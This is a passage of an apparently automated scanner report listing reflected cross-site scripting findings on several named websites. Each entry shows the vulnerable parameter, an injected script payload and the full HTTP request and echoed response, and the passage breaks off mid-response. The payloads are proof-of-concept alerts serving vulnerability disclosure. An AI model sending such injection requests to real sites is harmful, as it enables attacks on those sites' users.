5.21. http://app.streamsend.com/public/6EzE/J1l/subscribe [person%5Bemail_address%5D parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://app.streamsend.com |
| Path: |
/public/6EzE/J1l/subscribe |
Issue detail
The value of the person%5Bemail_address%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6907"><script>alert(1)</script>be1276185b1 was submitted in the person%5Bemail_address%5D parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
POST /public/6EzE/J1l/subscribe HTTP/1.1 Host: app.streamsend.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://app.streamsend.com/public/6EzE/J1l/subscribe Cookie: _session_id=28db46e0d36a1d842c30a4a081223ef9 Content-Type: application/x-www-form-urlencoded Content-Length: 109
person%5Bemail_address%5D=d6907"><script>alert(1)</script>be1276185b1&person%5Bfirst_name%5D=&person%5Blast_name%5D=&person%5Bcompany%5D=&commit=Sign+Up |
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:47:18 GMT Server: Apache/2.2.17 (Unix) Phusion_Passenger/2.2.14 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.13 X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.14 ETag: "a9a6760d0cc907f88c1fb3c58401559b" X-Runtime: 415 Cache-Control: private, max-age=0, must-revalidate Set-Cookie: _session_id=28db46e0d36a1d842c30a4a081223ef9cb9d00be50b208d8cc589c89; path=/; HttpOnly Status: 200 Vary: Accept-Encoding Content-Length: 3514 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head><script type="text/javascript">var NREUMQ=[];NREUMQ.push(["mark","firstbyte",new Date().getT ...[SNIP]... <input id="person_email_address" name="person[email_address]" size="30" type="text" value="d6907"><script>alert(1)</script>be1276185b1" /> ...[SNIP]...
|
5.22. http://app.streamsend.com/public/6EzE/J1l/subscribe [person%5Bfirst_name%5D parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://app.streamsend.com |
| Path: |
/public/6EzE/J1l/subscribe |
Issue detail
The value of the person%5Bfirst_name%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a021"><script>alert(1)</script>4ad34c01bc2 was submitted in the person%5Bfirst_name%5D parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
POST /public/6EzE/J1l/subscribe HTTP/1.1 Host: app.streamsend.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://app.streamsend.com/public/6EzE/J1l/subscribe Cookie: _session_id=28db46e0d36a1d842c30a4a081223ef9 Content-Type: application/x-www-form-urlencoded Content-Length: 109
person%5Bemail_address%5D=&person%5Bfirst_name%5D=9a021"><script>alert(1)</script>4ad34c01bc2&person%5Blast_name%5D=&person%5Bcompany%5D=&commit=Sign+Up |
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:47:25 GMT Server: Apache/2.2.17 (Unix) Phusion_Passenger/2.2.14 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.13 X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.14 ETag: "276aee8fb26ed37db5432aef5dc7789b" X-Runtime: 296 Cache-Control: private, max-age=0, must-revalidate Set-Cookie: _session_id=28db46e0d36a1d842c30a4a081223ef9cb9d00be50b208d8cc589c89; path=/; HttpOnly Status: 200 Vary: Accept-Encoding Content-Length: 3520 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head><script type="text/javascript">var NREUMQ=[];NREUMQ.push(["mark","firstbyte",new Date().getT ...[SNIP]... <input id="person_first_name" name="person[first_name]" size="30" type="text" value="9a021"><script>alert(1)</script>4ad34c01bc2" /> ...[SNIP]...
|
5.23. http://app.streamsend.com/public/6EzE/J1l/subscribe [person%5Blast_name%5D parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://app.streamsend.com |
| Path: |
/public/6EzE/J1l/subscribe |
Issue detail
The value of the person%5Blast_name%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efa61"><script>alert(1)</script>06ada816a86 was submitted in the person%5Blast_name%5D parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
POST /public/6EzE/J1l/subscribe HTTP/1.1 Host: app.streamsend.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://app.streamsend.com/public/6EzE/J1l/subscribe Cookie: _session_id=28db46e0d36a1d842c30a4a081223ef9 Content-Type: application/x-www-form-urlencoded Content-Length: 109
person%5Bemail_address%5D=&person%5Bfirst_name%5D=&person%5Blast_name%5D=efa61"><script>alert(1)</script>06ada816a86&person%5Bcompany%5D=&commit=Sign+Up |
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:47:33 GMT Server: Apache/2.2.17 (Unix) Phusion_Passenger/2.2.14 mod_ssl/2.2.17 OpenSSL/0.9.8b PHP/5.2.2 mod_fastcgi/2.4.2 X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.14 ETag: "1cf055de6227ab98043bb84b5157023e" X-Runtime: 373 Cache-Control: private, max-age=0, must-revalidate Set-Cookie: _session_id=28db46e0d36a1d842c30a4a081223ef9cb9d00be50b208d8cc589c89; path=/; HttpOnly Status: 200 Vary: Accept-Encoding Content-Length: 3578 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head><script type="text/javascript">var NREUMQ=[];NREUMQ.push(["mark","firstbyte",new Date().getT ...[SNIP]... <input id="person_last_name" name="person[last_name]" size="30" type="text" value="efa61"><script>alert(1)</script>06ada816a86" /> ...[SNIP]...
|
5.24. http://ar.voicefive.com/b/rc.pli [func parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ar.voicefive.com |
| Path: |
/b/rc.pli |
Issue detail
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 89adf<script>alert(1)</script>10099508dc9 was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction89adf<script>alert(1)</script>10099508dc9&n=ar_int_p108883753&1316282696361 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=1&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:03:59 2011&prad=65659550&arc=42804711&; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C
|
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 13:11:54 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 83
COMSCORE.BMX.Broker.handleInteraction89adf<script>alert(1)</script>10099508dc9(""); |
5.25. http://b.scorecardresearch.com/beacon.js [c1 parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://b.scorecardresearch.com |
| Path: |
/beacon.js |
Issue detail
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload ba3d5<script>alert(1)</script>4a7a4901935 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3ba3d5<script>alert(1)</script>4a7a4901935&c2=6034986&c3=SMGU-BNG-001-01-MRT&c4=224944440.225733735.224988341&c5=197083081&c6= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=ENT9AR&cb=1208617847 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
|
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 12:48:24 GMT Date: Sat, 17 Sep 2011 12:48:24 GMT Content-Length: 1291 Connection: close
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi ...[SNIP]... E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3ba3d5<script>alert(1)</script>4a7a4901935", c2:"6034986", c3:"SMGU-BNG-001-01-MRT", c4:"224944440.225733735.224988341", c5:"197083081", c6:"", c10:"", c15:"", c16:"", r:""});
|
5.26. http://b.scorecardresearch.com/beacon.js [c2 parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://b.scorecardresearch.com |
| Path: |
/beacon.js |
Issue detail
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 30c0e<script>alert(1)</script>5fefccbc8e2 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=603498630c0e<script>alert(1)</script>5fefccbc8e2&c3=SMGU-BNG-001-01-MRT&c4=224944440.225733735.224988341&c5=197083081&c6= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=ENT9AR&cb=1208617847 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
|
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 12:48:25 GMT Date: Sat, 17 Sep 2011 12:48:25 GMT Content-Length: 1291 Connection: close
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi ...[SNIP]... on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"603498630c0e<script>alert(1)</script>5fefccbc8e2", c3:"SMGU-BNG-001-01-MRT", c4:"224944440.225733735.224988341", c5:"197083081", c6:"", c10:"", c15:"", c16:"", r:""});
|
5.27. http://b.scorecardresearch.com/beacon.js [c3 parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://b.scorecardresearch.com |
| Path: |
/beacon.js |
Issue detail
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload d29a7<script>alert(1)</script>a2d83874ca3 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6034986&c3=SMGU-BNG-001-01-MRTd29a7<script>alert(1)</script>a2d83874ca3&c4=224944440.225733735.224988341&c5=197083081&c6= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=ENT9AR&cb=1208617847 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
|
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 12:48:27 GMT Date: Sat, 17 Sep 2011 12:48:27 GMT Content-Length: 1291 Connection: close
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi ...[SNIP]... ||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6034986", c3:"SMGU-BNG-001-01-MRTd29a7<script>alert(1)</script>a2d83874ca3", c4:"224944440.225733735.224988341", c5:"197083081", c6:"", c10:"", c15:"", c16:"", r:""});
|
5.28. http://b.scorecardresearch.com/beacon.js [c4 parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://b.scorecardresearch.com |
| Path: |
/beacon.js |
Issue detail
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload ad33b<script>alert(1)</script>93c84afa312 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6034986&c3=SMGU-BNG-001-01-MRT&c4=224944440.225733735.224988341ad33b<script>alert(1)</script>93c84afa312&c5=197083081&c6= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=ENT9AR&cb=1208617847 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
|
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 12:48:28 GMT Date: Sat, 17 Sep 2011 12:48:28 GMT Content-Length: 1291 Connection: close
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi ...[SNIP]... -){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6034986", c3:"SMGU-BNG-001-01-MRT", c4:"224944440.225733735.224988341ad33b<script>alert(1)</script>93c84afa312", c5:"197083081", c6:"", c10:"", c15:"", c16:"", r:""});
|
5.29. http://b.scorecardresearch.com/beacon.js [c5 parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://b.scorecardresearch.com |
| Path: |
/beacon.js |
Issue detail
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload cd29c<script>alert(1)</script>6bf969815c1 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6034986&c3=SMGU-BNG-001-01-MRT&c4=224944440.225733735.224988341&c5=197083081cd29c<script>alert(1)</script>6bf969815c1&c6= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=ENT9AR&cb=1208617847 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
|
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 12:48:29 GMT Date: Sat, 17 Sep 2011 12:48:29 GMT Content-Length: 1291 Connection: close
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi ...[SNIP]... acon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6034986", c3:"SMGU-BNG-001-01-MRT", c4:"224944440.225733735.224988341", c5:"197083081cd29c<script>alert(1)</script>6bf969815c1", c6:"", c10:"", c15:"", c16:"", r:""});
|
5.30. http://b.scorecardresearch.com/beacon.js [c6 parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://b.scorecardresearch.com |
| Path: |
/beacon.js |
Issue detail
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 543f1<script>alert(1)</script>6bcd4c21fbd was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6034986&c3=SMGU-BNG-001-01-MRT&c4=224944440.225733735.224988341&c5=197083081&c6=543f1<script>alert(1)</script>6bcd4c21fbd HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=ENT9AR&cb=1208617847 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
|
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 12:48:30 GMT Date: Sat, 17 Sep 2011 12:48:30 GMT Content-Length: 1291 Connection: close
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi ...[SNIP]... b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6034986", c3:"SMGU-BNG-001-01-MRT", c4:"224944440.225733735.224988341", c5:"197083081", c6:"543f1<script>alert(1)</script>6bcd4c21fbd", c10:"", c15:"", c16:"", r:""});
|
5.31. http://blekko.com/autocomplete [query parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://blekko.com |
| Path: |
/autocomplete |
Issue detail
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload 270f5<script>alert(1)</script>2627f1c1e5e was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /autocomplete?query=w270f5<script>alert(1)</script>2627f1c1e5e HTTP/1.1 Host: blekko.com Proxy-Connection: keep-alive Referer: http://blekko.com/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/plain, */*; q=0.01 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v=3; t=1316220316418
|
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 14:51:27 GMT Content-Type: text/plain; charset=utf-8 Connection: keep-alive Keep-Alive: timeout=15 Cache-Control: max-age=43200 Expires: Sun, 18 Sep 2011 02:51:27 GMT Vary: Accept-Encoding Content-Length: 71 X-Blekko-PT: df15f361ee300fac16a7f080511f5263
{"suggestions":[],"query":"w270f5<script>alert(1)</script>2627f1c1e5e"} |
5.32. http://d7.zedo.com/jsc/d3/fl.js [l parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://d7.zedo.com |
| Path: |
/jsc/d3/fl.js |
Issue detail
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c957"-alert(1)-"8b1ee8e53ae was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsc/d3/fl.js?n=1318&c=43/41&s=17&d=9&w=300&h=250&l=http://clk.atdmt.com/go/328208374/direct;wi.300;hi.250;01;ai.234573933.234596024;ct.1/01%3Fhref=8c957"-alert(1)-"8b1ee8e53ae&z=707230601 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=ENT9AM&cb=18890764 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,5#0,24:0,6#0,24:0,6#0,24; PI=h484782Za669089Zc826000187,826000187Zs173Zt1260Zm68Zb43199
|
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript ETag: "3a9d717-51ac-4a85262d8c280" Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=284 Expires: Sat, 17 Sep 2011 13:26:20 GMT Date: Sat, 17 Sep 2011 13:21:36 GMT Content-Length: 2389 Connection: close
// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.
var zzTitle='';
var w0=new Image();
var zzStr="q=;z="+Math.random();var zzSection=17;var zzPat='';
var zzhasAd;
...[SNIP]... 172;m=82;w=47;i=0;u=unknown;" + zzStr + zzIdxNw + zzIdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://clk.atdmt.com/go/328208374/direct;wi.300;hi.250;01;ai.234573933.234596024;ct.1/01%3Fhref=8c957"-alert(1)-"8b1ee8e53aehttp://w3.newsmax.com/newsletters/crandall/videog.cfm?PROMO_CODE=CF19-1\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOut='window.status=\"\"; return true ...[SNIP]...
|
5.33. http://d7.zedo.com/lar/v11-001/d7/jsc/flr.js [l parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://d7.zedo.com |
| Path: |
/lar/v11-001/d7/jsc/flr.js |
Issue detail
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63e07"-alert(1)-"00bf0ba6143 was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lar/v11-001/d7/jsc/flr.js?n=1318&c=43/41&s=17&d=9&w=300&h=250&l=http://clk.atdmt.com/go/328208374/direct;wi.300;hi.250;01;ai.234573933.234596024;ct.1/01%3Fhref=63e07"-alert(1)-"00bf0ba6143&z=707230601 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=ENT9AM&cb=18890764 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,5#0,24:0,6#0,24:0,6#0,24; PI=h484782Za669089Zc826000187,826000187Zs173Zt1260Zm68Zb43199; ZCBC=1
|
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript ETag: "1ea7ed1-4fbc-4a85262d8c280" Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=256 Date: Sat, 17 Sep 2011 13:22:04 GMT Content-Length: 2389 Connection: close
// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.
var zzTitle='';
var w0=new Image();
